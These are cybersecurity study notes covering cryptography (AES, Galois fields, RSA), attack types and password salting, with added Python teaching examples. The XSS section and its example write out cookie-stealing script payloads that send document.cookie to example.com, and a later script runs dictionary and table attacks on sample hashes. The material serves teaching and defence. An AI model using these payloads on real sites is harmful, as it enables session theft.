Cybersecurity Essentials: Threats, Controls, and Encryption


CIA Triad

The CIA Triad consists of Confidentiality, Integrity, and Availability. Related concepts include Authentication, Accountability, and Auditability.

Types of Harm

  • Interception
  • Interruption
  • Modification
  • Fabrication

Web Technologies

HTTP Methods

  • GET: Embeds parameters in the URL query string, so they end up in browser history, proxy and server logs, and Referer headers.
  • POST: Sends parameters in the request body, keeping them out of URLs and logs. It is not "more secure" on the wire: without TLS both methods are sent in the clear.
  • PUT: Creates or replaces the resource at the request URL with the body sent. Like POST it carries a body, but it is idempotent (repeating the request has the same effect), which is why it suits uploading a file to a known path.

Penetration Testing

5 Steps to Penetration Testing:

  1. Reconnaissance
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Clearing Tracks

Security Controls

  • Prevention: Outright stopping an attack.
  • Deterrence: Making an attack harder.
  • Deflection: Making a target less attractive.
  • Mitigation: Lessening the harm.
  • Detection: Identifying an attack.
  • Recovery: Redressing harm caused by an attack.

Types of Controls

  • Physical: Locks, guards.
  • Procedural: Scanning IDs.
  • Technical: Passwords, encryption.

Intellectual Property Law

  • Copyright: Protects creative works.
  • Patent: Protects inventions; lasts for 20 years.
  • Trademark: Protects brand names and logos; lasts as long as the mark stays in use and the registration is renewed (in the US, renewal falls due every 10 years), so it can outlive a patent indefinitely.

RSA Encryption

RSA is an asymmetric algorithm: the public key is used to encrypt (or to verify a signature) and the matching private key to decrypt (or to sign). Anyone may hold the public key; only the owner holds the private key.

Ethical Frameworks

  • Teleological: Focuses on outcomes/consequences. Good outcomes equate to morally good actions.
  • Deontological: Moral good is based on good principles, following laws and ethics, and appealing to authority.

Block Cipher Advantages

Block Cipher Advantage over Character-by-Character: a block cipher transforms a whole block at once (128 bits for AES), so each output block depends on all 2^128 possible input blocks rather than on a single character. Single-symbol frequency analysis, which breaks character-by-character substitution, no longer applies, making the cipher much harder to cryptanalyze.

Why ShiftRows is Important in AES

Without ShiftRows, bytes would never move between columns: SubBytes and AddRoundKey act on single bytes and MixColumns on single columns, so each 32-bit column would be encrypted independently of the other three. AES would degenerate into four independent 32-bit ciphers running side by side instead of one 128-bit cipher, and a change in one input column could never affect the other columns of the output.

How Galois Fields are Useful for Symmetric Encryption

Every operation on an n-bit value (n = 8 for AES bytes) yields another n-bit value, so the block size never changes as it passes through the cipher. Because every element has an additive inverse and every non-zero element a multiplicative inverse, each step is reversible, so decryption is a step-by-step undoing of encryption. Plain arithmetic mod 256 provides additive inverses but not multiplicative ones (no even number has an inverse mod 256), so a Galois field is needed for that. Having two invertible operations to combine (addition, which is XOR, and field multiplication) gives the designer more ways to mix the state.
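The following is an added example, not code from the original notes, that makes the last two sections concrete: it implements GF(2^8) multiplication and inversion as AES uses them, derives the S-box from the field inverse, and then runs key-less AES rounds with and without ShiftRows to count how far a one-byte change spreads. It assumes the AES reduction polynomial 0x11b, the S-box affine constant 0x63 and a column-major 4x4 state, and it drops AddRoundKey (bytewise, so it does not move information between bytes and does not change the counts).

```python
# Added example, not part of the original notes: GF(2^8) arithmetic as AES
# uses it, and a diffusion experiment isolating what ShiftRows contributes.
# Assumes the AES reduction polynomial x^8 + x^4 + x^3 + x + 1 (0x11b), the
# S-box affine constant 0x63 and a column-major 4x4 state; the round below
# omits AddRoundKey, which is bytewise and does not affect diffusion counts.

AES_POLY = 0x11B


def gf_mul(a: int, b: int) -> int:
    """Multiply two bytes in GF(2^8) modulo the AES polynomial.
    The product is always another byte, so the block size never grows."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:
            a ^= AES_POLY
        b >>= 1
    return result


def gf_inv(a: int) -> int:
    """Multiplicative inverse in GF(2^8). Every non-zero byte has exactly one;
    AES maps 0 to 0 by convention. Brute force is fine for 256 elements."""
    if a == 0:
        return 0
    for x in range(1, 256):
        if gf_mul(a, x) == 1:
            return x
    raise ValueError("unreachable: GF(2^8) is a field")


def mod256_inv(a: int):
    """Inverse under ordinary multiplication mod 256, or None if there is none.
    Even numbers have none (gcd(a, 256) != 1), which is why plain arithmetic
    mod 256 cannot give an invertible S-box and a field is needed."""
    for x in range(256):
        if (a * x) % 256 == 1:
            return x
    return None


def rotl8(v: int, n: int) -> int:
    return ((v << n) | (v >> (8 - n))) & 0xFF


def sbox(a: int) -> int:
    """AES S-box: field inverse followed by the affine transform."""
    x = gf_inv(a)
    return x ^ rotl8(x, 1) ^ rotl8(x, 2) ^ rotl8(x, 3) ^ rotl8(x, 4) ^ 0x63


def sub_bytes(s):
    return [sbox(b) for b in s]


def shift_rows(s):
    """State is column-major: byte r of column c sits at s[4*c + r].
    Row r is rotated left by r positions, moving bytes across columns."""
    return [s[4 * ((c + r) % 4) + r] for c in range(4) for r in range(4)]


def mix_columns(s):
    """Each column is multiplied by the fixed AES matrix in GF(2^8)."""
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [
            gf_mul(a0, 2) ^ gf_mul(a1, 3) ^ a2 ^ a3,
            a0 ^ gf_mul(a1, 2) ^ gf_mul(a2, 3) ^ a3,
            a0 ^ a1 ^ gf_mul(a2, 2) ^ gf_mul(a3, 3),
            gf_mul(a0, 3) ^ a1 ^ a2 ^ gf_mul(a3, 2),
        ]
    return out


def rounds(state, n, with_shift_rows=True):
    """n key-less AES rounds, optionally with ShiftRows removed."""
    for _ in range(n):
        state = sub_bytes(state)
        if with_shift_rows:
            state = shift_rows(state)
        state = mix_columns(state)
    return state


def bytes_affected(n_rounds: int, with_shift_rows: bool) -> int:
    """Flip one byte of an all-zero block and count output bytes that change."""
    base = [0] * 16
    flipped = [1] + [0] * 15
    a = rounds(base, n_rounds, with_shift_rows)
    b = rounds(flipped, n_rounds, with_shift_rows)
    return sum(1 for x, y in zip(a, b) if x != y)


if __name__ == "__main__":
    print("0x57 * 0x83 =", hex(gf_mul(0x57, 0x83)))  # FIPS-197 example: 0xc1
    print("inverses mod 256 of 2 and 3:", mod256_inv(2), mod256_inv(3))
    for r in (1, 2):
        print(f"{r} round(s): with ShiftRows {bytes_affected(r, True)} bytes change, "
              f"without ShiftRows {bytes_affected(r, False)} bytes change")
```

After two rounds with ShiftRows every one of the 16 output bytes depends on the flipped input byte; with ShiftRows removed the change never leaves the first column, which is the "four independent 32-bit ciphers" failure described above. The mod256_inv check shows the Galois field point directly: 2 has no inverse mod 256, while every non-zero byte has one in GF(2^8).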

RSA Formulas

  • Encryption: c = m^e mod n
  • Decryption: m = c^d mod n

Where: m = message encoded as an integer with 0 ≤ m < n, e = public (encryption) exponent, d = private (decryption) exponent chosen so that e · d ≡ 1 (mod φ(n)) with φ(n) = (p − 1)(q − 1), n = p · q for two large secret primes p and q, c = ciphertext
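The block below is an added example, not code from the original notes: textbook RSA with exactly the two formulas above, on the deliberately tiny primes 61 and 53 so every value can be checked by hand. It also shows why the textbook form is not used as-is: because c = m^e mod n has no randomness, anyone holding only the public key can turn a ciphertext of m into a valid ciphertext of k·m, which padding schemes such as OAEP exist to prevent. The primes and the message 65 are illustrative choices.

```python
# Added example, not part of the original notes: textbook RSA with the two
# formulas above. The primes 61 and 53 are deliberately tiny so every value
# can be checked by hand; real keys use primes of at least 1024 bits and a
# padding scheme such as OAEP, whose absence the last function exploits.
from math import gcd


def rsa_keygen(p: int, q: int, e: int = 65537):
    """Return ((e, n), (d, n)) with e*d = 1 mod phi(n), phi(n) = (p-1)(q-1)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def rsa_encrypt(m: int, public_key) -> int:
    """c = m^e mod n. The message must be an integer in [0, n)."""
    e, n = public_key
    if not 0 <= m < n:
        raise ValueError("message must satisfy 0 <= m < n")
    return pow(m, e, n)


def rsa_decrypt(c: int, private_key) -> int:
    """m = c^d mod n."""
    d, n = private_key
    return pow(c, d, n)


def forge_scaled_ciphertext(c: int, k: int, public_key) -> int:
    """Given only a ciphertext c = E(m) and the public key, produce E(k*m mod n)
    without learning m, because c * k^e = (m*k)^e (mod n). This is the
    malleability that padding (OAEP) removes from real-world RSA."""
    e, n = public_key
    return (c * pow(k, e, n)) % n


if __name__ == "__main__":
    pub, priv = rsa_keygen(61, 53, e=17)
    print("public key (e, n):", pub, "private key (d, n):", priv)
    c = rsa_encrypt(65, pub)
    print("E(65) =", c, "-> D(c) =", rsa_decrypt(c, priv))
    forged = forge_scaled_ciphertext(c, 2, pub)
    print("forged ciphertext decrypts to", rsa_decrypt(forged, priv), "(= 2 * 65)")
```

With p = 61 and q = 53 the worked numbers are n = 3233, φ(n) = 3120, e = 17, d = 2753 and E(65) = 2790, so each step of the two formulas can be verified with a calculator.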

Cyber Attacks

Dictionary Attack

Takes a list of candidate passwords (a wordlist), hashes each one the same way the target system does, and compares the results against stolen password hashes. Salting does not stop it: the attacker includes each account's stored salt when hashing, so the guesses must be redone for every account, but weak passwords are still recovered.

Rainbow Table Attack

Uses a precomputed table that maps hashes back to passwords (stored compactly as chains of hash and reduce steps) and looks each stolen hash up in it; a hit yields the password with no hashing at attack time. Infeasible if passwords are salted with a unique random salt per user, because the table would have to be rebuilt for every salt value.

DDoS (Distributed Denial of Service) Attack

Floods a service with more traffic or requests than it can handle, from many distributed sources (typically a botnet), so that legitimate users are denied service. Source IP spoofing appears in some variants (reflection and amplification attacks) to hide the sources and multiply the volume, but it is the number of sources, not spoofing, that makes the attack distributed.

XSS (Cross-Site Scripting)

Injection of attacker-controlled script into a page served by a trusted site; the victim's browser runs it with that site's origin and privileges. A sample payload that sends the victim's cookies to the attacker's server: <script>location.href='https://example.com/cookie='+document.cookie</script>. Cookies flagged HttpOnly are not readable through document.cookie, which limits this particular payload, but the fix for XSS itself is encoding untrusted data at the point where it is inserted into the page.
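The following is an added example, not code from the original notes: the payload above is reflected into a server-rendered page two ways, first unencoded and then through the standard-library html.escape, to show that output encoding is what neutralizes it. It goes slightly beyond the notes by also covering the attribute context, where the attacker closes a quoted attribute and adds an event handler instead of a script tag; the page templates, the search-term scenario and the attribute payload are constructed for this example.

```python
# Added example, not part of the original notes: the cookie-stealing payload
# above reflected into a page with and without output encoding. The page
# templates, the search-box scenario and ATTR_PAYLOAD are constructed here;
# html.escape is the Python standard-library HTML encoder.
import html

# The payload from the notes, as an attacker would submit it in a search box.
PAYLOAD = "<script>location.href='https://example.com/cookie='+document.cookie</script>"

# Constructed attribute-context payload (a generalization, not on the original
# page): closes the value="..." attribute and injects an event handler instead.
ATTR_PAYLOAD = '" onfocus="fetch(\'https://example.com/cookie=\'+document.cookie)" autofocus="'


def render_vulnerable(term: str) -> str:
    """Reflects user input straight into the HTML body: classic reflected XSS."""
    return f"<h1>Results for: {term}</h1>"


def render_escaped(term: str) -> str:
    """Encodes <, >, & and both quote characters so the browser sees text."""
    return f"<h1>Results for: {html.escape(term, quote=True)}</h1>"


def render_attr_vulnerable(term: str) -> str:
    """Same bug in an attribute context: the search box echoes the term back."""
    return f'<input type="search" value="{term}">'


def render_attr_escaped(term: str) -> str:
    """quote=True is what makes html.escape safe inside a quoted attribute."""
    return f'<input type="search" value="{html.escape(term, quote=True)}">'


def contains_live_script(page: str) -> bool:
    """True if the page still contains a real <script> tag (the encoded form
    &lt;script&gt; does not match, which is the point)."""
    return "<script" in page.lower()


def breaks_out_of_attribute(page: str) -> bool:
    """True if the input closed the quoted attribute and injected a new one."""
    return 'onfocus="' in page


if __name__ == "__main__":
    for label, page in [
        ("body, vulnerable", render_vulnerable(PAYLOAD)),
        ("body, escaped", render_escaped(PAYLOAD)),
        ("attribute, vulnerable", render_attr_vulnerable(ATTR_PAYLOAD)),
        ("attribute, escaped", render_attr_escaped(ATTR_PAYLOAD)),
    ]:
        exploitable = contains_live_script(page) or breaks_out_of_attribute(page)
        print(f"{label}: exploitable={exploitable}\n  {page}")
```

The encoding must match the context the data lands in: html.escape covers HTML text and quoted attributes, but data placed inside a script block, a URL or a CSS value needs that context's own encoding. Marking the session cookie HttpOnly is a separate, complementary control that keeps document.cookie empty even if an injection is missed.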

Calculating Bits for Passwords

Formula: log2(# of available characters) = # of bits per character
Total bits = bits per character × # of characters in password
Example: a 10-character password drawn from 62 alphanumerics gives 10 × log2(62) ≈ 59.5 bits. This assumes every character is chosen uniformly at random; human-chosen passwords carry far fewer bits than the formula suggests.

Salt and Pepper

  • Salt: A large random value (e.g., 256 bits) generated per user and stored next to the hash. It need not be secret; its job is to make each user's hash unique so that precomputed tables and cross-account hash comparison fail.
  • Pepper: Also a large random value, but one pepper is shared per service and is kept out of the database (in application config, an environment variable or an HSM), so an attacker who steals only the database cannot run offline guessing against it.
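The block below is an added example, not code from the original notes, that ties this section to the Dictionary Attack and Rainbow Table Attack entries above: it builds a small password store with per-user salts and an optional pepper, then runs a precomputed-table attack and a dictionary attack against each variant. The accounts, wordlist and pepper are constructed for the example, and SHA-256/HMAC are used only to keep it dependency-free; a real store would use a slow, memory-hard KDF such as argon2id, scrypt or bcrypt in place of sha256.

```python
# Added example, not part of the original notes: per-user salts, a per-service
# pepper kept out of the database, and the dictionary and precomputed-table
# attacks from the Cyber Attacks section run against the resulting store.
# The accounts, wordlist and pepper are constructed for this example.
# SHA-256/HMAC keep the example dependency-free; a real password store uses a
# slow, memory-hard KDF (argon2id, scrypt or bcrypt) instead of sha256.
import hashlib
import hmac
import secrets

# Constructed pepper. In production it lives in application config, an
# environment variable or an HSM, so a database dump does not include it.
PEPPER = bytes.fromhex("6f2d4c8b11e0a9d3f7c5b2e4d60a1f9c")


def hash_unsalted(password: str) -> str:
    """The weak baseline: one global function, same password -> same hash."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes, pepper: bytes = b"") -> str:
    """HMAC keyed with the pepper over salt||password. With an empty pepper
    this is plain salted hashing; the salt is stored next to the hash."""
    return hmac.new(pepper, salt + password.encode(), hashlib.sha256).hexdigest()


def make_records(accounts: dict, pepper: bytes = b"") -> list:
    """Build (username, salt, hash) rows as they would sit in the database.
    Each user gets a fresh 128-bit random salt."""
    rows = []
    for user, pw in accounts.items():
        salt = secrets.token_bytes(16)
        rows.append((user, salt, hash_password(pw, salt, pepper)))
    return rows


def precomputed_table_attack(stolen_hashes: list, wordlist: list) -> dict:
    """Stand-in for a rainbow table: hash the wordlist once, up front, then
    look every stolen hash up. Only works if the target used hash_unsalted."""
    table = {hash_unsalted(w): w for w in wordlist}
    return {h: table[h] for h in stolen_hashes if h in table}


def dictionary_attack(records: list, wordlist: list, pepper_guess: bytes = b"") -> dict:
    """Per-account guessing: rehash each candidate with that row's stored salt.
    Salting does not stop this; not knowing the pepper does."""
    cracked = {}
    for user, salt, stored in records:
        for w in wordlist:
            if hmac.compare_digest(hash_password(w, salt, pepper_guess), stored):
                cracked[user] = w
                break
    return cracked


# Constructed sample data: two weak passwords that appear in the wordlist,
# one strong passphrase that does not.
ACCOUNTS = {
    "alice": "password123",
    "bob": "correct horse battery staple",
    "carol": "letmein",
}
WORDLIST = ["123456", "password", "password123", "qwerty", "letmein"]


def run_scenarios() -> dict:
    """Return how many accounts each attack recovers under each defence."""
    unsalted = [hash_unsalted(pw) for pw in ACCOUNTS.values()]
    salted = make_records(ACCOUNTS)
    peppered = make_records(ACCOUNTS, PEPPER)
    return {
        "table_vs_unsalted": len(precomputed_table_attack(unsalted, WORDLIST)),
        "table_vs_salted": len(precomputed_table_attack([h for _, _, h in salted], WORDLIST)),
        "dictionary_vs_salted": len(dictionary_attack(salted, WORDLIST)),
        "dictionary_vs_peppered_db_only": len(dictionary_attack(peppered, WORDLIST)),
        "dictionary_vs_peppered_pepper_known": len(dictionary_attack(peppered, WORDLIST, PEPPER)),
    }


if __name__ == "__main__":
    for name, count in run_scenarios().items():
        print(f"{name}: {count} of {len(ACCOUNTS)} accounts recovered")
```

Salting alone defeats the precomputed table but leaves both weak passwords open to per-account dictionary guessing; the pepper blocks that too for an attacker who holds only the database, and stops helping the moment the pepper leaks with the application server. Bob's passphrase survives every scenario because it is not in the wordlist, which is the password-strength side of the same problem.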
